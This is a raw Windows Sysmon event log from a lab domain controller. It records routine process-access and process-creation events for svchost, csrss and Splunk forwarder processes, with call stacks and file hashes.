14:09:48.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:48.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.091{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-96AC-6005-8505-00000000A301}4920C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.091{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96AC-6005-8505-00000000A301}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.090{59A5CD1D-96AC-6005-8505-00000000A301}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96AD-6005-8705-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:49.480{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:49.480{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-96AD-6005-8705-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96AD-6005-8705-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-96AD-6005-8705-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
